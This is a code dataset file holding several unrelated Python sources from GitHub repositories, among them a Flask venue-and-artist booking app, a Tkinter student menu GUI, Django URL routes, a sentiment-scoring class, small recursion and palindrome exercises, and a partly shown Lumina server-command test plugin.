{"seq_id":"21745947924","text":"import webbrowser\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom datetime import date, time, datetime\nventana = Tk()\nventana.title(\"Principal\")\nventana.geometry(\"500x300\")\n\ndef fileOpen():\n    ventana.fileName = filedialog.askopenfilename(filetypes=((\"Arch texto\", \".txt\"), (\"Todo\", \".\")))\n    file = ventana.fileName\n    return file\n\ndef datos_est():\n    print(\"GERARDO JOSE CIFUENTES LUNA\")\n    print(\"201900952\")\n    print('Introduccion a la Programacion y Computacion 2 seccion \"E\" ')\n    print(\"Ingenieria en Ciencias y Sistemas\")\n    print(\"5to Semestre\")\n\ndef docu():\n    webbrowser.open_new(r\"Docu\\EnsayoProyecto2_201900952.pdf\")\ndef reportweb():\n    GG = open(\"menu.html\", \"w\")\n\n    fase = \"\"\"\n    <html>\n    <head>\n    <title>RESTAURANTE LFP</title>\n    </head>\n    <body>\n    <h1>Reporte de Logs</h1>\n    \"\"\"\n    GG.write(fase)\n    GG.write(\"<table border='1'>\")\n    GG.write(\"<tr><th>Nombre</th><th>Espacios Llenos</th><th>Espacios vacios</th><th>Fecha-Hora</th></tr>\")\n    GG.write(\"\"\"<tr><td>Cargar</td><td>n/a</td><td>n/a</td><td>\"\"\"+str(datetime.now())+\"\"\"</td></tr>\"\"\")\n    GG.write(\"</table>\")\n    GG.write(\"</body></html>\")\n    GG.close()\n    webbrowser.open_new_tab(\"menu.html\")\n\n\n##menu##\nbarra=Menu(ventana)\nCharge=Menu(barra)\nOper=Menu(barra)\nReprt=Menu(barra)\nHelp=Menu(barra)\n##Options##\nCharge.add_command(label=\"Seleccione Archivo\", command=fileOpen)\n\nOper.add_command(label=\"Rotacion Horizontal\")\nOper.add_command(label=\"Rotacion Vertical\")\nOper.add_command(label=\"Transpuesta\")\nOper.add_command(label=\"Limpiar Zona\")\nOper.add_command(label=\"Agregar linea Horizontal\")\nOper.add_command(label=\"Agregar linea Vertical\")\nOper.add_command(label=\"Agregar Rectangulo\")\nOper.add_command(label=\"Agregar Triangulo rectangulo\")\nOper.add_separator()\nOper.add_command(label=\"UNION\")\nOper.add_command(label=\"INTERSECCION\")\nOper.add_command(label=\"DIFERENCIA\")\nOper.add_command(label=\"DIFERENCIA SIMETRICA\")\n\nReprt.add_command(label=\"Abrir Reporte\", command=reportweb)\n\nHelp.add_command(label=\"Info del Estudiante\",command=datos_est)\nHelp.add_command(label=\"Documentacion\",command=docu)\n##Added to the menu##\nbarra.add_cascade(label=\"Cargar Archivo\", menu=Charge)\nbarra.add_cascade(label=\"Operaciones\", menu=Oper)\nbarra.add_cascade(label=\"Reportes\", menu=Reprt)\nbarra.add_cascade(label=\"Ayuda\", menu=Help)\nventana.config(menu=barra)\n##BUTTONS##\n\n\n\nPanel = PanedWindow(ventana, bd=4, relief=\"raised\")\nPanel.grid(row=1,column=1,columnspan=2, pady=20)\nstock=PhotoImage(file=\"Quemado.png\")\ntext = Label(Panel, text=\"Panel\", bg = \"blue\", pady=10)\ntext.pack()\ncuadro = Label(Panel, text=\"Cuadro\", bg = \"green\", padx=20,image=stock)\ncuadro.pack(side=LEFT)\nres = Label(Panel, text=\"resultado\", bg = \"black\", height=10, width=15, padx=20)\nres.pack(side=RIGHT)\n\n\n\n\nventana.mainloop()\n\n\n\n\n\n","repo_name":"Grd2-10x/IPC2Lab2_2021semestre","sub_path":"IPC2Proj2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"73167896804","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for, abort\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\nfrom flask_migrate import Migrate\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\n\nmigrate = Migrate(app, db)\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\n\nclass Venue(db.Model):\n  __tablename__ = 'venue'\n\n  id = db.Column(db.Integer, primary_key=True)\n  name = db.Column(db.String)\n  city = db.Column(db.String(120))\n  state = db.Column(db.String(120))\n  address = db.Column(db.String(120))\n  phone = db.Column(db.String(120))\n  image_link = db.Column(db.String(500))\n  facebook_link = db.Column(db.String(120))\n  genres = db.Column(db.ARRAY(db.String))\n  website = db.Column(db.String(120))\n  seeking_talent = 
db.Column(db.Boolean)\n seeking_description = db.Column(db.String)\n shows = db.relationship('Show',backref='venue_shows', lazy=True,cascade=\"all, delete-orphan\", passive_deletes=True)\n\nclass Artist(db.Model):\n __tablename__ = 'artist'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n phone = db.Column(db.String(120))\n genres = db.Column(db.ARRAY(db.String))\n image_link = db.Column(db.String(500))\n facebook_link = db.Column(db.String(120))\n website = db.Column(db.String(120))\n seeking_venue = db.Column(db.Boolean)\n seeking_description = db.Column(db.String)\n shows = db.relationship('Show',backref='artist_shows', passive_deletes=True, lazy=True)\n\nclass Show(db.Model):\n __tablename__ = 'show'\n\n id = db.Column(db.Integer, primary_key=True)\n venue_id = db.Column(db.Integer,db.ForeignKey('venue.id',ondelete='CASCADE'),nullable=False)\n artist_id = db.Column(db.Integer,db.ForeignKey('artist.id',ondelete='CASCADE'),nullable=False)\n start_time = db.Column(db.DateTime)\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n\n venues = Venue.query.order_by(Venue.state, Venue.city).all()\n data = []\n areas = db.session.query(Venue.city, Venue.state).distinct()\n \n for venue in areas:\n venue = dict(zip(('city', 'state'), venue))\n venue['venues'] = []\n for venue_data in Venue.query.filter_by(city=venue['city'], state=venue['state']).all():\n shows = Show.query.filter_by(venue_id=venue_data.id).all()\n upcoming_shows = []\n for show in shows:\n if show.start_time > datetime.now():\n upcoming_shows.append({\n \"artist_id\": show.artist_id,\n \"artist_name\": Artist.query.filter_by(id=show.artist_id).first().name,\n \"artist_image_link\": Artist.query.filter_by(id=show.artist_id).first().image_link,\n \"start_time\": format_datetime(str(show.start_time))\n })\n venues_data = {\n 'id': venue_data.id,\n 'name': venue_data.name,\n 'num_upcoming_shows': len(upcoming_shows)\n }\n venue['venues'].append(venues_data)\n data.append(venue)\n return render_template('pages/venues.html', areas=data)\n\n # replace with real venues data.\n # num_shows should be aggregated based on number of upcoming shows per venue.\n # data=[{\n # \"city\": \"San Francisco\",\n # \"state\": \"CA\",\n # \"venues\": [{\n # \"id\": 1,\n # \"name\": \"The Musical Hop\",\n # \"num_upcoming_shows\": 0,\n # }, {\n # \"id\": 3,\n # \"name\": \"Park Square Live Music & Coffee\",\n # \"num_upcoming_shows\": 1,\n # }]\n # }, {\n # \"city\": \"New York\",\n # \"state\": \"NY\",\n # \"venues\": [{\n # \"id\": 2,\n # \"name\": \"The Dueling Pianos Bar\",\n # \"num_upcoming_shows\": 0,\n # }]\n # }]\n # return 
render_template('pages/venues.html', areas=data);\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n  search_str = request.form.get('search_term')\n  flash(search_str)\n  venue_search = Venue.query.filter(Venue.name.ilike('%{}%'.format(search_str)))\n  venue_list = list(venue_search)\n  # implement search on artists with partial string search. Ensure it is case-insensitive.\n  # search for Hop should return \"The Musical Hop\".\n  # search for \"Music\" should return \"The Musical Hop\" and \"Park Square Live Music & Coffee\"\n  response = {\n    \"count\":len(venue_list),\n    \"data\": venue_list\n  }\n  return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/venues/<int:venue_id>')\ndef show_venue(venue_id):\n  venue = Venue.query.get(venue_id)\n  shows = Show.query.filter_by(venue_id=venue_id).all()\n  upcoming_shows = []\n  past_shows = []\n  for show in shows:\n    if show.start_time > datetime.now():\n      upcoming_shows.append({\n        \"artist_id\": show.artist_id,\n        \"artist_name\": Artist.query.filter_by(id=show.artist_id).first().name,\n        \"artist_image_link\": Artist.query.filter_by(id=show.artist_id).first().image_link,\n        \"start_time\": format_datetime(str(show.start_time))\n      })\n    else:\n      past_shows.append({\n        \"artist_id\": show.artist_id,\n        \"artist_name\": Artist.query.filter_by(id=show.artist_id).first().name,\n        \"artist_image_link\": Artist.query.filter_by(id=show.artist_id).first().image_link,\n        \"start_time\": format_datetime(str(show.start_time))\n      })\n\n  data={\n    \"id\": venue.id,\n    \"name\": venue.name,\n    \"genres\": venue.genres,\n    \"address\": venue.address,\n    \"city\": venue.city,\n    \"state\": venue.state,\n    \"phone\": venue.phone,\n    \"website\": venue.website,\n    \"facebook_link\": venue.facebook_link,\n    \"seeking_talent\": venue.seeking_talent,\n    \"seeking_description\": venue.seeking_description,\n    \"image_link\": venue.image_link,\n    \"past_shows\": past_shows,\n    \"upcoming_shows\": upcoming_shows,\n    \"past_shows_count\": len(past_shows),\n    \"upcoming_shows_count\": len(upcoming_shows),\n  }\n  return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n  form = VenueForm()\n  return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n  error = False\n  try:\n    new_venue = Venue(\n      name=request.form.get('name'),\n      city=request.form.get('city'),\n      state=request.form.get('state'),\n      address=request.form.get('address'),\n      phone=request.form.get('phone'),\n      image_link=request.form.get('image_link'),\n      genres=request.form.getlist('genres'),\n      facebook_link=request.form.get('facebook_link'),\n      website=request.form.get('website'),\n      seeking_talent=request.form.get('seeking_talent'),\n      seeking_description=request.form.get('seeking_description')\n    )\n    db.session.add(new_venue)\n    db.session.commit()\n\n  except Exception as e:\n    flash('An error occurred. 
Venue could not be listed.')\n    flash(f'Error: {e}')\n    error = True\n    db.session.rollback()\n  finally:\n    db.session.close()\n  if error:\n    # do not show success page.\n    return render_template('pages/home.html')\n  else:\n    flash('Venue ' + request.form.get('name') + ' was successfully listed!')\n    return render_template('pages/home.html')\n\n@app.route('/venues/<venue_id>', methods=['DELETE'])\ndef delete_venue(venue_id):\n  try:\n    Venue.query.filter_by(id=venue_id).delete()\n    db.session.commit()\n  except:\n    db.session.rollback()\n  finally:\n    db.session.close()\n  return None\n\n  # Complete this endpoint for taking a venue_id, and using\n  # SQLAlchemy ORM to delete a record. Handle cases where the session commit could fail.\n\n  # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\n  # clicking that button delete it from the db then redirect the user to the homepage\n\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n  artists = Artist.query.order_by(Artist.name).all()\n  data = []\n  for artist in artists:\n    artist_data = {\n      \"id\": artist.id,\n      \"name\": artist.name,\n    }\n    data.append(artist_data)\n  return render_template('pages/artists.html', artists=data)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n  search_str = request.form.get('search_term')\n  artist_search = Artist.query.filter(Artist.name.ilike('%{}%'.format(search_str)))\n  artist_list = list(artist_search)\n\n  response = {\n    \"count\":len(artist_list),\n    \"data\": artist_list\n  }\n\n  return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/artists/<int:artist_id>')\ndef show_artist(artist_id):\n  artist = Artist.query.get(artist_id)\n  shows = Show.query.filter_by(artist_id=artist_id).all()\n  upcoming_shows = []\n  past_shows = []\n  for show in shows:\n    if show.start_time > datetime.now():\n      upcoming_shows.append({\n        \"artist_id\": show.artist_id,\n        \"artist_name\": Artist.query.filter_by(id=show.artist_id).first().name,\n        \"artist_image_link\": Artist.query.filter_by(id=show.artist_id).first().image_link,\n        \"start_time\": format_datetime(str(show.start_time))\n      })\n    else:\n      past_shows.append({\n        \"artist_id\": show.artist_id,\n        \"artist_name\": Artist.query.filter_by(id=show.artist_id).first().name,\n        \"artist_image_link\": Artist.query.filter_by(id=show.artist_id).first().image_link,\n        \"start_time\": format_datetime(str(show.start_time))\n      })\n\n  data={\n    \"id\": artist.id,\n    \"name\": artist.name,\n    \"genres\": artist.genres,\n    \"city\": artist.city,\n    \"state\": artist.state,\n    \"phone\": artist.phone,\n    \"website\": artist.website,\n    \"facebook_link\": artist.facebook_link,\n    \"seeking_venue\": artist.seeking_venue,\n    \"seeking_description\": artist.seeking_description,\n    \"image_link\": artist.image_link,\n    \"past_shows\": past_shows,\n    \"upcoming_shows\": upcoming_shows,\n    \"past_shows_count\": len(past_shows),\n    \"upcoming_shows_count\": len(upcoming_shows),\n  }\n  return render_template('pages/show_artist.html', artist=data)\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists/<int:artist_id>/edit', methods=['GET'])\ndef edit_artist(artist_id):\n  artist = Artist.query.get(artist_id)\n  form = ArtistForm(obj=artist)\n  return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists/<int:artist_id>/edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n  error = False\n  try:\n    artist = 
Artist.query.get(artist_id)\n    # no trailing commas here: 'artist.name = value,' would store a 1-tuple\n    artist.name=request.form.get('name')\n    artist.city=request.form.get('city')\n    artist.state=request.form.get('state')\n    artist.phone=request.form.get('phone')\n    artist.genres=request.form.getlist('genres')\n    artist.facebook_link=request.form.get('facebook_link')\n    db.session.commit()\n\n  except Exception as e:\n    flash('An error occurred. Artist could not be updated.')\n    flash(f'Error: {e}')\n    error = True\n    db.session.rollback()\n  finally:\n    db.session.close()\n  if error:\n    # do not show success page.\n    return redirect(url_for('show_artist', artist_id=artist_id))\n  else:\n    flash('Artist ' + request.form.get('name') + ' was successfully updated!')\n    return redirect(url_for('show_artist', artist_id=artist_id))\n\n\n@app.route('/venues/<int:venue_id>/edit', methods=['GET'])\ndef edit_venue(venue_id):\n  venue = Venue.query.get(venue_id)\n  form = VenueForm(obj=venue)\n  return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues/<int:venue_id>/edit', methods=['POST'])\ndef edit_venue_submission(venue_id): \n  error = False\n  try:\n    venue = Venue.query.get(venue_id)\n    # again, plain assignments so each column gets a value rather than a tuple\n    venue.name=request.form.get('name')\n    venue.city=request.form.get('city')\n    venue.state=request.form.get('state')\n    venue.address=request.form.get('address')\n    venue.phone=request.form.get('phone')\n    venue.genres=request.form.getlist('genres')\n    venue.facebook_link=request.form.get('facebook_link')\n    db.session.commit()\n\n  except Exception as e:\n    flash('An error occurred. Venue could not be updated.')\n    flash(f'Error: {e}')\n    error = True\n    db.session.rollback()\n  finally:\n    db.session.close()\n  if error:\n    # do not show success page.\n    return redirect(url_for('show_venue', venue_id=venue_id))\n  else:\n    flash('Venue ' + request.form.get('name') + ' was successfully updated!')\n    return redirect(url_for('show_venue', venue_id=venue_id))\n\n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n  form = ArtistForm()\n  return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n  error = False\n  try:\n\n    new_artist = Artist(\n      name=request.form.get('name'),\n      city=request.form.get('city'),\n      state=request.form.get('state'),\n      phone=request.form.get('phone'),\n      image_link=request.form.get('image_link'),\n      genres=request.form.getlist('genres'),\n      facebook_link=request.form.get('facebook_link'),\n      website=request.form.get('website'),\n    )\n    db.session.add(new_artist)\n    db.session.commit()\n\n    #genres = SelectMultipleField( 'genres', validators=[DataRequired(), AnyOf(values=genres)], choices=genres )\n\n  except Exception as e:\n    flash('An error occurred. 
Artist ' + request.form.get('name') + 'could not be listed.')\n flash(f'Error: {e}')\n error = True\n db.session.rollback()\n finally:\n db.session.close()\n if error:\n # do not show success page.\n return render_template('pages/home.html')\n else:\n flash('Artist ' + request.form.get('name') + ' was successfully listed!')\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n shows = Show.query.order_by(Show.start_time).all()\n data = []\n for show in shows:\n show_data = {\n \"venue_id\": show.venue_id,\n \"venue_name\": Venue.query.filter_by(id=show.venue_id).first().name,\n \"artist_id\": show.artist_id,\n \"artist_name\": Artist.query.filter_by(id=show.artist_id).first().name,\n \"artist_image_link\": Artist.query.filter_by(id=show.artist_id).first().image_link,\n \"start_time\": format_datetime(str(show.start_time))\n }\n data.append(show_data)\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n error = False\n try:\n new_show = Show(\n artist_id=request.form.get('artist_id'),\n venue_id=request.form.get('venue_id'),\n start_time=request.form.get('start_time'),\n )\n db.session.add(new_show)\n db.session.commit()\n\n except Exception as e:\n flash(f'An error occurred. Show could not be listed. Error: {e}')\n error = True\n db.session.rollback()\n finally:\n db.session.close()\n if error:\n # do not show success page.\n return render_template('pages/home.html')\n else:\n flash('Show was successfully listed!')\n return render_template('pages/home.html')\n\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","repo_name":"FlixKo/Fyyur","sub_path":"starter_code/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42105428130","text":"\"\"\"\nRename to explicit-python-aspect\nexplicit-pyspect\nexpyspect\n\"\"\"\nimport inspect\n\nfrom aspect.advices import AdviceType, get_class_advice_methods\n\n\ndef bind(target_bind_cls):\n def decorator(source_bind_cls):\n before_target_methods = dict(get_class_advice_methods(target_bind_cls, AdviceType.BEFORE))\n after_target_methods = dict(get_class_advice_methods(target_bind_cls, AdviceType.AFTER))\n\n source_methods = dict(inspect.getmembers(source_bind_cls, predicate=inspect.isfunction))\n\n for method_name in source_methods:\n 
if (method_name in before_target_methods) or (method_name in after_target_methods):\n                def decorated_method(*args, **kwargs):\n                    if method_name in before_target_methods:\n                        before_target_methods[method_name](*args, **kwargs)\n\n                    result = source_methods[method_name](*args, **kwargs)\n\n                    if method_name in after_target_methods:\n                        after_target_methods[method_name](*args, **kwargs)\n                    return result\n\n                setattr(source_bind_cls, method_name, decorated_method)\n        return source_bind_cls\n    return decorator\n","repo_name":"Gamazic/python-explicit-aspect","sub_path":"aspect/targets.py","file_name":"targets.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"15762158506","text":"# def my_pow(number, degree):\n#     if degree <= 1:\n#         return number\n#\n#     return number * my_pow(number, degree - 1)\n#\n# print(my_pow(3, 3))\n# # my_pow(3, 3) => 3 * my_pow(3,2) => 27\n# # my_pow(3, 2) => 3 * my_pow(3,1) => 9\n# # my_pow(3, 1) => 3\n\ndef sum_range(a, b):\n\n    if a > b:\n\n        return 0\n\n    return a + sum_range(a+1, b)\n\n\n\nprint(sum_range(2, 5))\n\n# sum_range(2, 5) => 2 + 3 => 5\n# sum_range(2, 5) => 4+ 5 => 9\n","repo_name":"steranoksana/Homework-lesson-8","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25846417062","text":"#Bansari Shah\r\n#ICS3U0\r\n#Palindrome; page 267\r\n#27 Oct 2020\r\n\r\nstring = input(\"Enter Text: \")\r\nmid = (len(string) // 2)\r\n\r\nPalindrome = True\r\nfor index in range(mid):\r\n    if string[index] != string[- (index + 1)]: \r\n        Palindrome = False\r\n        break\r\nif Palindrome == True:\r\n    print(True)\r\nelse:\r\n    print(False)\r\n\r\n############################################\r\n##string = input().split()\r\n##string.lower()\r\n##print(string)\r\n##word = []\r\n##for char in string:\r\n##    for i in range(len(char)):\r\n##        word.append(char[i])\r\n##Palindrome = True\r\n##for index in range((len(word)//2)):\r\n##    if word[index] != word[- (index + 1)]: \r\n##        Palindrome = False\r\n##        break\r\n##if Palindrome == True:\r\n##    print(True)\r\n##else:\r\n##    print(False)\r\n##\r\n##\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n    \r\n","repo_name":"bxnsari2312/Small-Games","sub_path":"SIMPLE-GAME_OR_APPLICATIONS/Palindrome; Page 269.py","file_name":"Palindrome; Page 269.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27436228475","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url, include\n\nfrom .views import OrgView, AddUserRequestView, OrgHomeView, OrgCourseView, OrgDescView, OrgTeacherView, AddFavView\n\nurlpatterns = [\n\t# 明星学校列表首页\n\turl(r'^list/$', OrgView.as_view(), name='org_list'),\n\turl(r'^add_request/$', AddUserRequestView.as_view(), name=\"add_request\"),\n\turl(r'^home/(?P\\d+)/$', OrgHomeView.as_view(), name=\"org_home\"),\n\turl(r'^course/(?P\\d+)/$', OrgCourseView.as_view(), name=\"org_course\"),\n    url(r'^desc/(?P\\d+)/$', OrgDescView.as_view(), name=\"org_desc\"),\n\turl(r'^teacher/(?P\\d+)/$', OrgTeacherView.as_view(), name=\"org_teacher\"),\n\t# 学校收藏\n\turl(r'^add_fav/$', AddFavView.as_view(), name=\"add_fav\"),\n]\n","repo_name":"mingsquall/django-cloud-edu-platform","sub_path":"k12online/apps/organization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6764078808","text":"import pandas as pd\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import PorterStemmer\nfrom nltk.corpus import stopwords\nfrom nltk.probability import FreqDist\nfrom WordModel.wordAccuracy import WordAccuracyTesting\nfrom PhraseModel.phraseAccuracy import PhraseAccuracyTesting\nimport statistics\nps = PorterStemmer()\n\nclass OverallScore:\n\n    def __init__(self, testing_data):\n        self.outputDf = pd.DataFrame(columns=[\"Sentiment\",\"Message\",\"Actual Score\",\"Predicted Overall Score\"])\n        self.phraseDf = pd.DataFrame(columns=[\"Sentiment\",\"Message\",\"Actual Score\",\"Predicted Phrase Score\"])\n        self.wordDf = pd.DataFrame(columns=[\"Sentiment\",\"Message\",\"Actual Score\",\"Predicted Word Score\"])\n        self.phraseAccuracy = PhraseAccuracyTesting()\n        self.wordAccuracy = WordAccuracyTesting()\n        self.testing_data = testing_data\n\n    def runScores(self, sentimentPhrases, sentiments, x, y, runWordAccuracy, runPhraseAccuracy):\n        numRight = 0\n        totalCases = self.testing_data.shape[0]\n        for i in range(0,self.testing_data.shape[0]):\n            sentiment = self.testing_data['SentimentName'][i]\n            sentiment = sentiment.upper()\n            message = self.testing_data['Messages'][i]\n            message = message.lower()\n            correctScore = self.testing_data['ManualScore'][i]\n            wordResults = [None, None, None, None]\n            phraseResults = [None, None, None, None]\n            if runWordAccuracy == True:\n                wordResults = self.wordAccuracy.runAccuracyTest(sentiments, sentiment, message, correctScore)\n            if runPhraseAccuracy == True:\n                phraseResults = self.phraseAccuracy.runAccuracyTest(sentimentPhrases, sentiment, message, correctScore)\n            score = self.getOverallScore(wordResults, phraseResults, x, y)\n            if wordResults[2] == True and phraseResults[2] == True:\n                totalCases-=1\n                print(\"Did not find \", sentiment, \" in trained model with \", len(sentimentPhrases), \" sentiments\")\n            elif wordResults[3] == True and phraseResults[3] == True:\n                totalCases-=1\n                #print('No sentiment score for this message.')\n            if score == correctScore:\n                numRight+=1\n            self.outputDf = self.outputDf.append({'Sentiment': sentiment, 'Message':message, 'Actual Score': correctScore, 'Predicted Overall Score': score}, ignore_index=True)\n            self.phraseDf = self.phraseDf.append({'Sentiment': sentiment, 'Message':message, 'Actual Score': correctScore, 'Predicted Phrase Score': phraseResults[1]}, ignore_index=True)\n            self.wordDf = self.wordDf.append({'Sentiment': sentiment, 'Message':message, 'Actual Score': correctScore, 'Predicted Word Score': wordResults[1]}, ignore_index=True)\n        \n        print(totalCases)\n        print(numRight)\n        answerPercent = (numRight/totalCases) * 100\n        self.outputDf.to_excel('score.xlsx')\n        self.phraseDf.to_excel('phraseScore.xlsx')\n        self.wordDf.to_excel('wordScore.xlsx')\n        testing = [answerPercent, x, y]\n        print(testing)\n        return testing\n\n    def getOverallScore(self, wordResults, phraseResults, x, y):\n        wordScore = 0\n        phraseScore = 0\n        if wordResults[0] != None:\n            wordScore = wordResults[1]\n        if phraseResults[0] != None:\n            phraseScore = phraseResults[1]\n        score = ((wordScore*x)+(phraseScore*y)) / 100\n        return round(score)\n\n","repo_name":"saarangbond/ML-MessageScoring","sub_path":"overall.py","file_name":"overall.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"33215427278","text":"import sys\nimport heapq\n\nn = int(sys.stdin.readline().rstrip())\ntotal = 0\nheap = []\nfor _ in range(n):\n    num = int(sys.stdin.readline().rstrip())\n    heapq.heappush(heap, num)\n# 우선순위 정렬\n\nwhile len(heap) > 1:\n    num1 = heapq.heappop(heap)\n    num2 = heapq.heappop(heap)\n    total += num1 + num2\n    # 힙 안에 두 개 이상 수가 남아 있다면 최솟값 두 개를 합하는 게 가장 작은 수를 구하는 방법\n    heapq.heappush(heap, num1+num2)\n\nprint(total)","repo_name":"PJunyeong/Coding-Test","sub_path":"백준/Bronze/1715_카드 정렬하기.py","file_name":"1715_카드 정렬하기.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"312498596","text":"# -*- python -*-\n\"\"\" Test plugin for testing commands sent directly to the server \"\"\"\nfrom __future__ import absolute_import, division, print_function\n\n#import traceback\n\nfrom twisted.internet.defer import Deferred\n\nfrom lumina.plugin import Plugin\nfrom lumina.node import Node\nfrom lumina.message import Message\nfrom lumina.exceptions import ConfigException\n\n\n# To test this plugin, use config conf/tests/server_command.json\n\nclass ServerCommand(Node):\n    \"\"\" (TEST) A plugin for generating server commands as direct requests \"\"\"\n\n\n    def setup(self):\n        self.status.set_GREEN()\n\n        self.master_server = self.master.get_plugin_by_module('server')\n        if not self.master_server:\n            raise ConfigException(\"Not running on the server\")\n\n        self.runner = self.execute()\n        self.master.reactor.callLater(4, self.do_next)\n\n\n\n    def execute(self):\n        cmds = (\n            ('nonexist', 101),      # Test nonexisting command\n            ('_name', 102),         # Local command\n\n            ('cmd/1', 201),         # Remote command\n            ('cmd/error', 202),     # Remote command with error\n            ('cmd/timeout', 203),   # Remote command that returns TimeoutException\n            ('cmd/never', 204),     # Test a command that timeout the link\n            ('cmd/2', 205),         # Remote command\n\n            ('group/local', 301),   # Local group\n            ('group/123', 302),     # Remote group\n            ('group/fail', 303),    # Group with failure\n            ('group/nonexist', 304), # Group with failure\n        )\n\n        for c in cmds:\n            yield ('DIRECT', self.master_server.run_command, c)\n            yield ('REMOTE', self.send, c)\n\n    \n    def do_next(self):\n        try:\n            n = self.runner.next()\n            self.send_cmd(*n)\n        except StopIteration:\n            self.master.reactor.stop()\n\n\n    def send_cmd(self, text, fn, cmd):\n        ''' Send command to server and print the response '''\n        self.log.info(' ')\n        self.log.info(' ')\n        self.log.info('---{t} #{n}--------------------------------', t=text, n=cmd[1])\n        m = Message.create('command', cmd[0], *cmd[1:])\n        self.log.info('COMMAND: {m}', m=m)\n        try:\n            d = fn(m)\n            self.log.info('   1) RESULT : {d}', d=d)\n        except Exception as e:\n            self.log.info('   1) FAILED IMMEDIATELY: {c}, {e}', c=e.__class__.__name__, e=e)\n            d = None\n            #self.log.info('TB={tb}', tb=traceback.format_exc())\n        self.log.info('   1) MESSAGE: {m}', m=m)\n\n        if not isinstance(d, Deferred):\n            self.log.info('-----------------------------------------------')\n            self.do_next()\n            return\n\n        def ok(result):\n            self.log.info('   2) OK RESULT: {r}', r=result)\n        def err(failure):\n            self.log.info('   2) ERR RESULT: {r}', r=failure)\n        def both(ign):\n            self.log.info('   2) 